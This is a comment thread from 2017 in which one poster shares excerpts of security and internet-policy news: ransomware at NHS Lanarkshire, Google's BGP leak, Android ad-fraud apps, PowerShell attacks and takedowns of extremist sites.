Security trends 2017

3,151 Comments

1. August 26, 2017 at 7:31 am

   Tomi Engdahl says:

   Mark Bergen / Bloomberg:
   YouTube’s policy changes to crack down on extremist content go into effect this week with new restrictions on viewing, sharing, and monetizing videos

   Google Begins Biggest Crackdown on Extremist YouTube Videos
   https://www.bloomberg.com/news/articles/2017-08-24/google-rolls-out-its-biggest-crackdown-on-youtube-hate-speech

   Starting on Thursday, Google will police YouTube like it never has before, adding warnings and disabling advertising on videos that the company determines crosses its new threshold for offensive content.

   YouTube isn’t removing the selected videos, but is instead setting new restrictions on viewing, sharing and making money on them.

   “These videos will have less engagement and be harder to find,”

   The new restrictions, which target what Walker called “inflammatory religious or supremacist content,” are expected to hit a small fraction of videos, according to person familiar with the company. YouTube says it uploads over 400 hours of video a minute. Videos tagged by its new policy won’t be able to run ads or have comments posted, and won’t appear in any recommended lists on the video site. A warning screen will also appear before the videos, which will not be able to play when embedded on external websites. YouTube will let video creators contest the restrictions through an appeals process, a spokeswoman said.

   Reply
2. August 27, 2017 at 6:40 pm

   Tomi Engdahl says:

   Lily Hay Newman / Wired:
   Microsoft’s Lee Holmes on the company’s recent efforts to bolster security of the PowerShell framework, which has long been a high-profile target for hackers — THE TRICKBOT MALWARE that targets bank customers. Password harvesters like Mimikatz. “Fileless malware” attacks.

   Microsoft’s Bid to Save PowerShell From Hackers Starts To Pay Off
   https://www.wired.com/story/microsoft-powershell-security

   The Trickbot malware that targets bank customers. Password harvesters like Mimikatz. “Fileless malware” attacks. All three are popular hacking tools and techniques, but they’re unconnected except for one trait: They all rely in part on manipulating a Windows management tool known as PowerShell to carry out their attacks.

   Long a point of interest for security researchers, PowerShell techniques increasingly pop up in real-world attacks. Last year, well over a third of the incidents assessed by security firm Carbon Black and its partners involved some sort of PowerShell component. But as network defenders catch on to Microsoft’s recent release of additional PowerShell protections, the attack sequences that exploit PowerShell are finding some long-overdue resistance.

   A framework like PowerShell has several network security benefits, because it can facilitate tedious but necessary tasks, like pushing updates and configuration improvements across a large number of devices.

   But the same qualities that make PowerShell versatile and and easy to use—it sends trusted commands to devices throughout a network—also make it an appealing tool for attackers.

   Reply
3. August 27, 2017 at 7:36 pm

   Tomi Engdahl says:

   Joseph Marks / Defense One:
   Eight out of 28 of Trump’s Homeland Security cybersecurity panel resign, citing “insufficient attention” to the issues, Charlottesville comments, more

   Trump Cybersecurity Advisers Resign In ‘Moral’ Protest
   http://www.defenseone.com/politics/2017/08/trump-cybersecurity-advisers-resign-moral-protest/140535/

   Board members also condemned the president’s response to racist violence in Charlottesville, Va.

   More than one-quarter of a panel tasked with advising the Homeland Security Department on cybersecurity and infrastructure protection resigned en masse Monday, citing President Donald Trump’s “insufficient attention” to the nation’s cyber vulnerabilities, among other complaints.

   “The moral infrastructure of our nation is the foundation on which our physical infrastructure is built,” the council members stated in a group resignation letter.

   “Your actions have threatened the security of the homeland I took an oath to protect,” the letter writers tell the president.

   The resignations come after Trump disbanded two business advisory councils earlier this month following a wave of resignations by chief executive officers. Those CEOs similarly condemned Trump’s response to the violence in Charlottesville.

   The former infrastructure council members particularly faulted Trump administration efforts to ensure the digital security of election systems.

   “You have given insufficient attention to the growing threats to the cybersecurity of the critical systems upon which all Americans depend, including those impacting the systems supporting our democratic election process,” the letter states.

   Reply
4. August 28, 2017 at 7:44 am

   Tomi Engdahl says:

   WannaCrypt NHS victim Lanarkshire infected by malware again
   Infect me once, shame on you. Infect me twice …
   https://www.theregister.co.uk/2017/08/28/wannacrypt_nhs_victim_lanarkshire_infected_by_malware_again/

   One of the UK National Health Service boards hit by WannaCrypt earlier this year has again been infected by malware.

   The Lanarkshire board manages the Hairmyres Hospital, Monklands Hospital, and Wishaw General Hospital in Scotland, and on Friday had to warn patients that it was only handling emergency cases.

   Lanarkshire was one of the many NHS districts hit by the WannaCrypt ransomware attack earlier this year.

   The latest infection took out the hospital’s staff rostering and telephone systems, and on Saturday morning NHS Lanarkshire posted this brief statement on its Facebook page:

   “Due to NHS Lanarkshire IT issues, the staff bank system and telephone are offline and currently unavailable”

   At the time, NHS Lanarkshire expected a 72 hour outage, and CEO Calum Campbell attributed the outage to malware, with systems taken offline to contain the outbreak with help from its IT provider.

   it posted an update requesting that people avoid visiting emergency departments unless absolutely necessary.

   appointments would be re-scheduled.

   Reply
5. August 28, 2017 at 7:47 am

   Tomi Engdahl says:

   Google routing blunder sent Japan’s Internet dark on Friday
   Another big BGP blunder
   https://www.theregister.co.uk/2017/08/27/google_routing_blunder_sent_japans_internet_dark/

   Last Friday, someone in Google fat-thumbed a border gateway protocol (GGP) advertisement and sent Japanese Internet traffic into a black hole.

   The trouble began when The Chocolate Factory “leaked” a big route table to Verizon, the result of which was traffic from Japanese giants like NTT and KDDI was sent to Google on the expectation it would be treated as transit.

   Since Google doesn’t provide transit services, as BGP Mon explains, that traffic either filled a link beyond its capacity, or hit an access control list, and disappeared.

   The outage in Japan only lasted a couple of hours, but was so severe that Japan Times reports the country’s Internal Affairs and Communications ministries want carriers to report on what went wrong.

   BGP Mon dissects what went wrong here, reporting that more than 135,000 prefixes on the Google-Verizon path were announced when they shouldn’t have been.

   Since it leaked what the monitors call “a full table” to Verizon, the fat-thumb error also provided a “peek into what Google’s peering relationships look like and how their peers traffic engineer towards Google”.

   BGP leak causing Internet outages in Japan and beyond.
   https://bgpmon.net/bgp-leak-causing-internet-outages-in-japan-and-beyond/

   A closer look at our data shows not only BGP hijack incidents but also a high number of BGP leak events. A random example is this one: 171.5.0.0/17 announced by AS45629 (Jastel out of Thailand), which all of a sudden became reachable with Google as a provider for Jastel.

   In the example above we can see how Google accidentally became a transit provider for Jastel by announcing peer prefixes to Verizon. Since verizon would select this path to Jastel it would have sent traffic for this network towards Google. Not only did this happen for Jastel, but thousands of other networks as well.

   Google is not a transit provider and traffic for 3rd party networks should never go through the Google network. Jastel has a few upstream providers and with the addition of Google and Verizon to the path, it’s likely only Verizon customers (which is still significant) would have chosen this path and only those that had no other alternative or specifically prefered Verizon over shorter paths. However this is just the start.

   A word about traffic engineering
   Google is one of the largest (CDN) networks in the world. It has an open peering policy and is extremely well connected with many peers. It’s also the source of a large amount of traffic with popular websites such as Youtube, Google search, Google Drive, Google Compute, etc. As a result many networks exchange a significant volume of traffic with just Google and those with direct peering with Google will want to make sure Google picks the right peering link with them. So as result large networks will start to deploy traffic engineering tricks to make sure traffic flows over the correct peering links with Google. The most powerful trick in the book is to start de-aggregating and announce more specifics. This means no matter the AS path length or whatever local-pref Google sets locally, the more specific prefixes are always preferred.

   A unique insight into Google’s network

   Since Google essentially leaked a full table towards Verizon, we get to peek into what Google’s peering relationships look like and how their peers traffic engineer towards Google. Analyzing this data set we find many more specific prefixes. Meaning prefixes that are not normally seen in the global Internet routing table (DFZ) and only made visible to Google for traffic engineering requirements.

   Reply
6. August 28, 2017 at 8:39 am

   Tomi Engdahl says:

   AI Training Algorithms Susceptible To Backdoors, Manipulation
   https://slashdot.org/story/17/08/27/0553203/ai-training-algorithms-susceptible-to-backdoors-manipulation

   Three researchers from New York University (NYU) have published a paper this week describing a method that an attacker could use to poison deep learning-based artificial intelligence (AI) algorithms. Researchers based their attack on a common practice in the AI community where research teams and companies alike outsource AI training operations using on-demand Machine-Learning-as-a-Service (MLaaS) platforms.

   https://arxiv.org/pdf/1708.06733v1.pdf

   Reply
7. August 28, 2017 at 8:42 am

   Tomi Engdahl says:

   Sarahah’s anonymous messenger application suddenly rose to the top of the rocket to app loading statistics. Sarahah has been at the top of the download lists in both the Google and Applese app store

   Nowadays a security researcher has revealed unpleasant things.

   Bishop Foxinn analyst Zachary Julian noticed with BURP Suite that Sarahah sends information out of the Android phone. The application may ask permission to read the phonebook at installation, but at no time will it reveal that it is sending data forward.

   At the first startup, Sarahah will transfer phone numbers and email addresses from the phone to the manufacturer’s server. The spyware feature applies to both Android and iOS versions.

   The author of The Intercept reminds me that it is not just the end of one’s own data for a company. Additionally, there is a risk that data from the server of that company will end up in the process of data hijacking.

   The program’s presentation text claims that contact list information is used to tell the user who friends are also Sarahah users. But it does not do that. Such a feature expressly defies the fundamental principle of the program as a whole. If there are only a handful of users in the circle of friends, it’s easy to find out who the “anonymous” questions from the application come from.

   Source: http://www.tivi.fi/Kaikki_uutiset/uusi-hittisovellus-urkkii-salaa-tietoja-6671950

   Reply
8. August 28, 2017 at 8:46 am

   Tomi Engdahl says:

   UK seeks early deal with EU on post-Brexit data sharing
   Britain to argue that there should be no substantial regulatory changes as a result of leaving the EU
   https://www.theguardian.com/technology/2017/aug/24/uk-seeks-early-deal-with-eu-on-post-brexit-data-sharing

   The government is seeking to negotiate a deal over data sharing with Europe in which there are no substantial regulatory changes as a result of Brexit.

   The ambitious strategy emerged on Thursday in the last of a series of summer policy papers published by the Department for Exiting the European Union ahead of the next round of talks in Brussels on Monday.

   In it, the government argues that its “unique” status as a leading player in the world of electronic commerce means that it should be able to demand special treatment from the EU when agreeing future standards.

   Reply
9. August 28, 2017 at 9:49 am

   Tomi Engdahl says:

   SD Card Data Diode System
   https://hackaday.io/project/21568-sd-card-data-diode-system

   A system to transfer files from an airgapped PC to an non-airgapped PC by dumping files from SD card to serial port back to another SD card.

   Using 2 Arduino Uno’s with an SD card shield and the SD card libraries, and a working serial data diode design, I hope to build a system to transfer files from one SD card to another without the possibility for the receiving side to talk back to the transmitting side.

   Reply
10. August 28, 2017 at 10:00 am

    Tomi Engdahl says:

    OpenJDK may tackle Java security gaps with secretive group
    The private group would tackle code vulnerabilities that currently are handled without coordination—or not at all
    https://www.infoworld.com/article/3219831/java/openjdk-may-tackle-java-security-gaps-with-secretive-group.html

    To shore up Java’s security, a private group that operates outside the normal open source community process is under consideration.

    The proposed OpenJDK (Java Development Kit) Vulnerability Group would provide a secure, private forum in which trusted members of the community receive reports on vulnerabilities in code bases and then review and fix them. Coordinating the release of fixes also would be part of the group’s mandate. (Java SE, the standard edition of Java, has been developed under the auspices of OpenJDK.)

    The vulnerability group and Oracle’s internal security teams would work together, and it may occasionally need to work with external security organizations.

    The group would be unusual in several respects, and thus requires an exemption from OpenJDK bylaws. Due to the sensitive nature of its work, membership in the group would be more selective, there would be a strict communication policy, and members or their employers would need to sign both a nondisclosure and a license agreement, said Mark Reinhold, chief architect of the Java platform group at Oracle

    Reply
11. August 28, 2017 at 10:36 am

    Tomi Engdahl says:

    Interesting story. True or not – hard to verify. Judge yourself:

    How the NSA identified Satoshi Nakamoto
    https://medium.com/@amuse/how-the-nsa-caught-satoshi-nakamoto-868affcef595

    The ‘creator’ of Bitcoin, Satoshi Nakamoto, is the world’s most elusive billionaire. Very few people outside of the Department of Homeland Security know Satoshi’s real name.

    Satoshi has taken great care to keep his identity secret employing the latest encryption and obfuscation methods in his communications. Despite these efforts (according to my source at the DHS) Satoshi Nakamoto gave investigators the only tool they needed to find him — his own words.

    Using stylometry one is able to compare texts to determine authorship of a particular work. Throughout the years Satoshi wrote thousands of posts and emails and most of which are publicly available. According to my source, the NSA was able to the use the ‘writer invariant’ method of stylometry to compare Satoshi’s ‘known’ writings with trillions of writing samples from people across the globe.

    The NSA then took bulk emails and texts collected from their mass surveillance efforts.

    The NSA’s proprietary software, bulk email collection ability, and computing power made it possible for them to conclusively identify Satoshi.

    The moral of the story? You can’t hide on the internet anymore. Your sentence structure and word use is MORE unique than your own fingerprint. If an organization, like the NSA, wants to find you they will.

    Reply
12. August 28, 2017 at 6:56 pm

    Tomi Engdahl says:

    Ethical hackers spoof buggy sales system to buy a MacBook for $1
    https://thenextweb.com/security/2017/08/28/macbook-dollar-pos-bug/#.tnw_CxI6LYbl

    Apple retails its MacBooks at notoriously high rates, but hackers might have found a way to bend the system – and possibly bring the price down to a measly dollar.

    Researchers from software security firm ERPScan have discovered a vulnerability in point-of-sale terminals developed by SAP and Oracle. If exploited, the flaw could grant attackers authorization to tap into the back-end system and tamper with prices and discounts for any item.

    the system’s Xpress server suffered from a slew of missing authorization measures. What was particularly jarring about this is that, in addition to access to credit card data, it also enabled attackers to gain unfettered control over the server.

    “Broadly speaking, it’s not a problem of SAP. Many POS systems have similar architecture and thus same vulnerabilities,” said Chastuhin.

    “The connections between POS workstation and the store server […] [often] lack the basics of cybersecurity – authorization procedures and encryption – and nobody cares about it. So, once an attacker is in the network, he or she gains full control of the system.”

    Following the second report, SAP has now successfully patched both vulnerabilities.

    Reply
13. August 29, 2017 at 7:58 am

    Tomi Engdahl says:

    India has blocked the Internet Archive nationwide and won’t say why [Update]
    https://thenextweb.com/in/2017/08/09/india-has-blocked-the-internet-archive-nationwide-and-wont-say-why/#.tnw_WyXQGanX

    The Indian government is no stranger to cutting off access to websites for its citizens as and when it sees fit, and to doing so without notifying users. While it’s previously obstructed access to porn sites, GitHub and WordPress.com, its latest stunt is perhaps the most audacious to date: blocking the Internet Archive.

    Reply
14. August 29, 2017 at 7:59 am

    Tomi Engdahl says:

    Google made a tiny error and it broke half the internet in Japan
    https://thenextweb.com/google/2017/08/28/google-japan-internet-blackout/

    When an ISP makes a tiny mistake, the outcome could have immense repercussions – and this is precisely what happened in Japan last week.

    Last Friday, half the internet in the country suddenly shut down after the Big G accidentally botched a Border Gateway Protocol (BGP) around noon local time. The origin of the blunder was a number of falsely announced peer prefixes sent to Verizon.

    Shortly after the faulty rerouting request went through, numerous users of internet providers NTT Communications and KDDI Corp. were unable to connect to the web – or experienced significantly slower surfing speeds.

    Google has since owned up to its mistake, assuming full responsibility for its role in the blackout.

    “We set wrong information for the network and, as a result, problems occurred. We modified the information to the correct one within eight minutes,” a company spokesperson told The Asahi Shimbun. “We apologize for causing inconvenience and anxieties.”

    Reply
15. August 29, 2017 at 9:58 am

    Tomi Engdahl says:

    Thousands of ‘innocent’ Android apps watch videos and view ads behind your back, says report
    https://www.cnbc.com/2017/08/28/android-apps-use-phone-wiithout-permission-ad-fraud-ezanga-report.html

    A recent study by eZanga showed over 1,300 Android apps contained one specific malware that makes people’s phones view ads and videos without their knowledge.
    After the study, eZanga said the number ballooned to more than 6,000 apps.
    It could cause advertisers up to $2,000,000 to $10,000,000 daily in fraudulent ad traffic, eZanga said.

    The report estimated the top apps using this SDK module, one of which could have been downloaded up to 1 million times in the Google Play store, could cost advertisers anywhere between $2,000,000 to $10,000,000 daily in fraudulent ad traffic.

    On June 7, they found 312 apps with the SDK module — 53 of which were in the Google Play store. A week after, the SDK module was in 750 apps, 300 of which were in the store. Two days after that, the number ballooned to 1,330 apps, and 317 were available for purchase in the store.

    The majority of the apps were live wallpapers, or free backgrounds for Android phones that featured cute cats, nature scenes or other cool effects. Others were free versions of popular apps like File Explorer or other photo-editing software.

    While Apple formally approves every app that goes into its store, Android developers can upload directly to the Google Play store and have people download their apps almost immediately, eZanga CEO Rich Kahn explained.

    A Google spokesperson said all apps submitted to Google Play are automatically scanned for potentially malicious code and spammy developer accounts before they are published.

    Google Play did remove all the apps eZanga named in the study within a few weeks, Khan said. H

    POTENTIAL $3 BILLION PER YEAR THREAT
    https://cdn2.hubspot.net/hubfs/2215919/Longform_Content/Anura%20Mobile%20App%20Fraud%20Final%207-10-17/anura-mobile-app-fraud-2_Final.pdf?t=1503687425079

    Bad bots are malicious programs and software applications that run automated tasks unbeknownst
    to those affected. They usually try to simulate human activity and are financially motivated

    OVER $6.5 BILLION WILL BE LOST TO BOTS IN 2017

    Anura® has detected click attempts made from a variety of apps available on the Google Play Store.
    Anura® developers isolated two apps – Lovely Rose and Oriental Beauty – and installed them on a
    mobile device, monitoring activity over a 24-hour time period.
    During this time frame, the device remained untouched and unused, in sleep mode. The click logs
    however indicated a collective 3,061 requests for an ad of which ads were potentially granted 169
    times. Brands receiving these clicks include the likes of Snapchat and Wendy’s but the issue lies in
    how they received the clicks. The phone was not in use so who clicked the ad? A bot.

    How Do These Apps Commit Fraud
    Understanding how these apps have gone undetected for so long is key to understanding how to
    stop it.

    Once the infected application is installed (or if already installed, once the phone is turned on), it
    waits 6 minutes before initiating its script. Once the script is initiated, the sequence starts and
    repeats this pattern every hour.

    This script is written in such a way that it generates a randomized SubID, ClickID , and keyword.
    To
    do so, it makes a call to the PHP document to obtain a
    list of keywords and zero click URL’s, that tells the bot where to perform fraudulent “clicks.”

    Once the SubID, ClickID, and keyword are generated and ad feeds obtained, this script runs in what is
    called a “zero click environment,” loading a pop-under in a custom, although non-viewable web view.
    With the zero click model “the user” or bot is forced through to the advertiser’s site.

    To stay under the radar, the bot generates page views and clicks on a site by following a scripted pattern.
    The code is even written to mimic a finger lifting off the phone post click.

    Security Concerns with the OS
    When you touch a screen on a device, you are touching a piece of hardware. That hardware triggers
    an event to the OS, which sends the signal to the app, indicating that some event took place – in
    this case a finger “touching” the screen. However, this script is able to mimic the event that the OS
    would send to the app, telling the app that this event took place.  It may be possible that this can be
    a security hole that can be updated to prevent this even from being triggered from everything other
    than the hardware.

    Reply
16. August 29, 2017 at 2:18 pm

    Tomi Engdahl says:

    Why cybercriminals like AI as much as cyberdefenders do
    https://www.americanbanker.com/news/why-cybercriminals-like-ai-as-much-as-cyber-defenders-do

    Artificial technology may escalate a long-running arms race between financial institutions and cybercriminals.

    The technology is helping banks’ cybersecurity teams detect and deal with breaches. Unfortunately, AI also creates new vulnerabilities in systems, since leaving machines in charge opens up opportunities for mistakes and manipulation. Further, AI helps attackers do their jobs more efficiently. For example, in attacks carried out last year, the writers of the Petya malware used AI to identify vulnerabilities and scan millions of ports in seconds to find the holes.

    “AI is a hammer that can be used for good or bad,” said Jim Fox, a partner, principal and cybersecurity and privacy assurance leader at PwC. “And if your adversaries have a hammer, you’d better have one, too.”

    In the right hands, this mighty hammer can do a lot of good. Artificial intelligence software can monitor all network activity and quickly discern odd patterns that could indicate foul play, even if such patterns haven’t been flagged before. It can learn over time to discern truly suspicious behavior from normal patterns.

    “Most of the threats we’re dealing with now aren’t solved by traditional tools like signature-based antivirus [software], or anything that has a signature,” Shaffer said. “The real threat actors know how to get by them. What you’re really interested in is trying to figure out what the smart actors are doing. That’s where machine learning and AI come into play.”

    Shaffer installed an AI-based system from Vectra that watches all network traffic at Greenhill. It spots anomalies that standard intrusion detection software can’t see, he said. (Other companies offering AI-based or enhanced cybersecurity products include IBM, Darktrace, FireEye and McAfee.)

    “That to a lot of systems would look like somebody doing a scan on your network,” Shaffer said

    The dark side of AI

    The U.S. intelligence community has raised a litany of concerns about the use of artificial intelligence: that it increases vulnerabilities to cyberattacks, raises difficulties in attribution, facilitates the advances of foreign weapon and intelligence systems through technology, increases the risks of accidents and substantially increases liability for the private sector, including financial institutions.

    “What the U.S. government has said is if everything is run by machines and there’s no more human intervention, then AI is our total law enforcement, our total gatekeeper of everything,” said Christine Duhaime, an attorney at Duhaime Law, based in Toronto. “So the more we get interconnected — the more there are systems deciding what’s safe, what’s good, what’s bad — the more it’s going to be vulnerable because we’re counting on our systems to be smarter and better than the hacker in another country who wants to do us harm.”

    The government has also said AI could increase the risks of accidents and substantially increase liability for the private sector including financial institutions, she pointed out. In other words, the more systems decide things on their own, the greater the likelihood they’ll make a massive mistake that’s really hard to undo.

    How criminals use AI

    “The reason we have so much financial cybercrime is it’s a very efficient way to steal money with a lower risk of arrest and prosecution,” Grobman said. “The reason cybercriminals don’t knock over banks as much as they use malware or other cyber techniques is because the technology lends itself to providing better outcomes.”

    “We’re looking at: how will bad actors attempt to poison models?” he said. For instance, crooks might introduce specially crafted data into the data sets the models look at that will make the models easier to evade in the future.

    Bad actors are also starting to use AI to automate formerly human tasks, Grobman said. For instance, AI can generate spear phishing emails tailored to an individual through tidbits found through email or social media searches.

    “Instead of requiring humans to tailor content to the individual, they can en masse create content that is tailored to individuals and thus can have a higher victim conversion rate,” he said.

    Grobman has mixed feelings about the government’s warnings about AI.

    Reply
17. August 29, 2017 at 2:19 pm

    Tomi Engdahl says:

    Rare WW2 encryption machine, “Hitler Mill”, found in Bavarian forest
    http://scienceblogs.de/klausis-krypto-kolumne/2017/08/19/rare-ww2-encryption-machine-hitler-mill-found-in-bavarian-forest/

    The SG-41, also known as Hitler Mill, was the successor of the Enigma encryption machine. Detectorists have now found a specimen in a Bavarian forest.

    Reply
18. August 29, 2017 at 2:20 pm

    Tomi Engdahl says:

    Internet providers could easily snoop on your smart home
    https://techcrunch.com/2017/08/28/study-tracks-what-smart-home-activity-can-be-seen-by-internet-providers/

    We’ve mostly moved past the point where our Internet of Things devices leak private information to anyone watching via unsecured connections, but that doesn’t mean you can stop being afraid. Never, ever stop being afraid. To top up your paranoia reserves, a new study finds that internet providers can, if they so choose, monitor all kinds of things from your smart home’s traitorous metadata.

    The paper, from a team at Princeton’s computer science school led by grad student Noah Apthorpe, gets straight to the point: “we demonstrate that an ISP or other network observer can infer privacy sensitive in-home activities by analyzing internet traffic from smart homes containing commercially available IoT devices even when the devices use encryption.”

    It’s a pretty straightforward attack: the IoT devices often identify themselves voluntarily, usually by connecting to specific domains or URLs. Even if they didn’t, there are simple ways of profiling them based on observation and some known data. The researchers demonstrated this by showing that various devices show distinct patterns of data transmission:

    Spying on the Smart Home: Privacy Attacks and Defenses on Encrypted IoT Traffic
    https://arxiv.org/abs/1708.05044

    Reply
19. August 29, 2017 at 2:25 pm

    Tomi Engdahl says:

    Ransomware behind NHS Lanarkshire cyber-attack
    http://www.bbc.com/news/uk-scotland-glasgow-west-41076591

    It has been confirmed that ransomware was behind a cyber-attack on a Scottish health board which led to some appointments and procedures being cancelled.

    NHS Lanarkshire said it was a new variant of Bitpaymer that infected its network on Friday.

    The board said staff worked over the weekend to reinstate IT systems.

    Work is ongoing to establish how the malware was able to infiltrate the network without being detected.

    Ransomware is a particularly destructive form of malware that catastrophically struck the NHS earlier this year.

    While this new infection is not the notorious Wannacry variation, which caused global chaos, it is yet another demonstration of how disruptive ransomware can be.

    What it does is encrypt the data it finds on a host computer so that it can no longer be accessed, and then demands payment, often in Bitcoin, for its release.

    Experts recommend resorting to back-up files rather than paying the ransom itself as there’s no guarantee that the criminals behind it will keep to their word – but there are many examples of cases where individuals and organisations have chosen to part with their cash.

    The best defence is to keep software updated and use anti-virus protection but it can be difficult for large organisations like the NHS to implement this en-masse, when complicated, life-saving equipment is running off a network that may not adjust well to even minor tweaks.

    A spokesman added: “Our security software and systems were up to date with the latest signature files, but as this was a new malware variant the latest security software was unable to detect it.

    Reply
20. August 29, 2017 at 2:29 pm

    Tomi Engdahl says:

    Stormfront: ‘murder capital of internet’ pulled offline after civil rights action
    https://www.theguardian.com/technology/2017/aug/29/stormfront-neo-nazi-hate-site-murder-internet-pulled-offline-web-com-civil-rights-action

    Web.com pulls support for one of the oldest and largest neo-nazi hate sites following campaign by Lawyers’ Committee for Civil Rights Under Law

    One of the oldest and largest neo-nazi sites on the internet, the white supremacist chatroom Stormfront, has been thrown off the open web by its hosting provider.
    Stormfront has been described by the anti-hate group Southern Poverty Law Center as the “murder capital of the internet”. The group pointed out that “registered Stormfront users have been disproportionately responsible for some of the most lethal hate crimes and mass killings since the site was put up in 1995. In the past five years alone, Stormfront members have murdered close to 100 people.”

    As of Tuesday morning, Stormfront.org was unavailable, with the site’s domain registry recording that its hosting provider Network Solutions had issued a “hold” on the address.

    Stormfront’s removal comes a week after a letter, informing Network Solution’s parent company Web.com of the neo-nazi site’s infractions of the its usage policy, was sent by the Lawyers’ Committee for Civil Rights Under Law, a civil rights organisation formed at the request of John F Kennedy in 1963.

    The move follows the downfall of the Daily Stormer, a far-right news site which was dropped by multiple service providers after it published an article smearing the victim of a far-right terrorist attack in Charlottesville, Virginia. Eventually, the site was forced to move to the so-called dark web due to the lack of companies willing to work with it publicly.

    Reply
21. August 29, 2017 at 2:52 pm

    Tomi Engdahl says:

    How to build a cybersecurity team
    https://www.cio.com/article/3219371/leadership-management/how-to-build-a-cybersecurity-team.html

    Building a cybersecurity team to address growing security threats can be challenging. Learn how some companies are tackling the issue.

    Cybersecurity professionals are bracing for continued attacks this year, effectively boosting their budgets by an average of 21%, according to the 2017 Cybersecurity Trends Report published by the National Center for the Midmarket.

    These cybersecurity professionals are focused specifically on cloud infrastructure, training and educating end users, and securing mobile devices.

    While concerns around cybersecurity are high, more than half of midmarket companies operate with limited to no strategy at all.

    Adding to the issue is the fact that cybersecurity is ever changing, according to Brian Hill of Computer Forensic Services. Technology offers convenience, but “every time we gain convenience, we give up something in security,” he said.

    Security is everyone’s business

    Following the attack, information security officers were strategically placed in critical organizations across the campus’s centralized IT division.

    “We’re of the opinion that security isn’t my job; it’s everyone’s job,” Bates said.

    Staff up cybersecurity teams from the inside

    At Boston-based MathWorks, IT director Jim Habeeb had only a part-time security team composed of networking specialists and various IT staffers. He sat down with the CFO and president, who now sits on the company’s security advisory team, to persuade them to hire a full-time chief information security officer (CISO) who could then help develop a hiring plan.

    After advertising for positions to build the security team, Habeeb opted to post the positions internally.

    “Highly skilled staff require a premium salary, and you want to be fair to your internal staff to expand their skills,” he explained. “When you hire from the outside, it can be hard to get someone who wants to hit the ground running in the best interest of the company rather than doing what they already know or are familiar with doing.”

    The team conducted a vulnerability scan of the company’s network environment and examined the perimeter for gaping holes. It then worked with risk management and legal counsel to prioritize what information to protect and what’s risky enough to ignore.

    Reply
22. August 29, 2017 at 3:38 pm

    Tomi Engdahl says:

    Standard sets specifications for securing the physical network
    http://www.cablinginstall.com/articles/print/volume-25/issue-8/features/installation/standard-sets-specifications-for-securing-the-physical-network.html?cmpid=enl_cim_cim_data_center_newsletter_2017-08-28

    Published in February 2016, the ANSI/TIA-5017 Telecommunications Physical Network Standard covers the security of telecommunications cables, pathways, spaces, and other elements of the physical infrastructure, according to the Telecommunications Industry Association (TIA). The standard “includes design guidelines, installation practices, administration, and management,” the association continues. “This standard addresses guidelines for new construction as well as renovation of existing buildings. The standard also provides installation guidelines for implementing security cabling systems for premises security systems with an integrated security approach.”

    Sections of the standard cover security planning and risk assessment, design and installation guidelines, other guidelines and recommendations, physical network security guidelines, intelligent building systems for security, and administration considerations for security. It recognizes three levels of cabling infrastructure security: SL1 (basic security installation), SL2 (tamper-resistant installation), and SL3 (critical security installation).

    Reply
23. August 29, 2017 at 3:38 pm

    Tomi Engdahl says:

    PoC Released for Dangerous iOS Kernel Exploit
    http://www.securityweek.com/poc-released-dangerous-ios-kernel-exploit

    Proof-of-concept (PoC) code has been released for recently patched iOS vulnerabilities that can be chained to take full control of a mobile device. The flaws could also be useful for a jailbreak, according to the researcher who found them.

    iOS 10.3.2, which Apple released in mid-May, patches seven AVEVideoEncoder vulnerabilities and one IOSurface flaw discovered by Adam Donenfeld of mobile security firm Zimperium. The security holes, which Apple says can be used by an application to gain kernel privileges, are believed to affect all prior versions of the iOS operating system.

    The vulnerabilities are tracked as CVE-2017-6979, CVE-2017-6989, CVE-2017-6994, CVE-2017-6995, CVE-2017-6996, CVE-2017-6997, CVE-2017-6998 and CVE-2017-6999. The bugs were discovered between January 24 and March 20, when they were reported to Apple.

    Reply
24. August 29, 2017 at 3:39 pm

    Tomi Engdahl says:

    Google Introduces App Engine Firewall
    http://www.securityweek.com/google-introduces-app-engine-firewall

    Google on Thursday informed cloud platform customers that the beta release of its App Engine firewall is available for testing.

    The Google App Engine firewall allows developers and administrators to easily allow or block traffic from specified IP addresses by defining a set of rules and ordering them based on priority.

    Hosting an application in the cloud has many benefits, but unwanted traffic can have a negative impact on workloads and it can result in significant costs.

    According to Google, the App Engine firewall addresses this problem by returning an HTTP 403 Forbidden response to requests from denied IP addresses before they hit the application.

    “App Engine firewall replaces the need for a code-based solution within your app that still allows requests in, but which can cost you resources and still expose your app,” explained Lorne Kligerman, product manager at Google.

    Reply
25. August 29, 2017 at 3:40 pm

    Tomi Engdahl says:

    Three Questions Every CISO Should Be Able to Answer
    http://www.securityweek.com/three-questions-every-ciso-should-be-able-answer

    Working with technical officers and cyber security specialists around the world, our conversations often center around a few key themes – the risk posed by IoT, the difficulty of detecting potentially malicious data transfers, and the overall lack of visibility into user and device activity.

    To understand the scale of the challenge, three questions in particular should be asked of your security team.

    1. Can you account for every device on the network?

    In my experience, even the most veteran security teams consistently underestimate the number of devices on their network, sometimes by up to 30 percent. And many companies lack the ability to detect anomalous activity on IoT devices and other non-conventional IT

    2. Do you know where data is traveling, both internally and externally?

    In the hack of the Democratic National Committee in 2016, the culprits allegedly exfiltrated 80GB of data – roughly 500MB a day. And yet, even large, anomalous data transfers like these are liable to get lost in the noise of a busy network. More sophisticated attackers may steal or alter much smaller amounts of data at a time, slowly embedding themselves within networks, disguised as normal traffic.

    Understanding which movements of data are legitimate, and which are not, is complicated and requires context

    3. Do you have meaningful oversight of how your users behave?

    External threats tend to get the most attention, but insider threats represent an equally serious security risk. Especially when it comes from trusted employees, unusual and threatening behavior is notoriously difficult to spot. After all, these threat actors have badges into the building and passwords for the network.

    An employee logging in at an unusual time, groups of files being aggregated, an abnormal volume of downloads – on their own, these actions might seem insignificant, and mostly they are. However, together they can be correlated and act as weak indicators that form a compelling picture of an emerging threat.

    Reply
26. August 29, 2017 at 3:40 pm

    Tomi Engdahl says:

    Hundreds of Russians Protest Tighter Internet Controls
    http://www.securityweek.com/hundreds-russians-protest-tighter-internet-controls

    About 1,000 Russians braved pouring rain in Moscow on Saturday to demonstrate against the government’s moves to tighten controls on internet use, with police arresting about a dozen protesters.

    Shouting slogans such as “Russia will be free” and “Russia without censorship”, the protesters were escorted by several police officers, in a march authorised by local authorities.

    Reply
27. August 29, 2017 at 3:41 pm

    Tomi Engdahl says:

    Tech Firms Unite to Neutralize WireX Android Botnet
    http://www.securityweek.com/tech-firms-unite-neutralize-wirex-android-botnet

    Black clouds on the internet do sometimes have a silver lining. Global attacks such as those from Mirai last year and WannaCry/NotPetya this year have fomented informal collaborative global responses — one of which happened this month when multiple competitive vendors collaborated in the research and neutralization of a major new botnet called WireX.

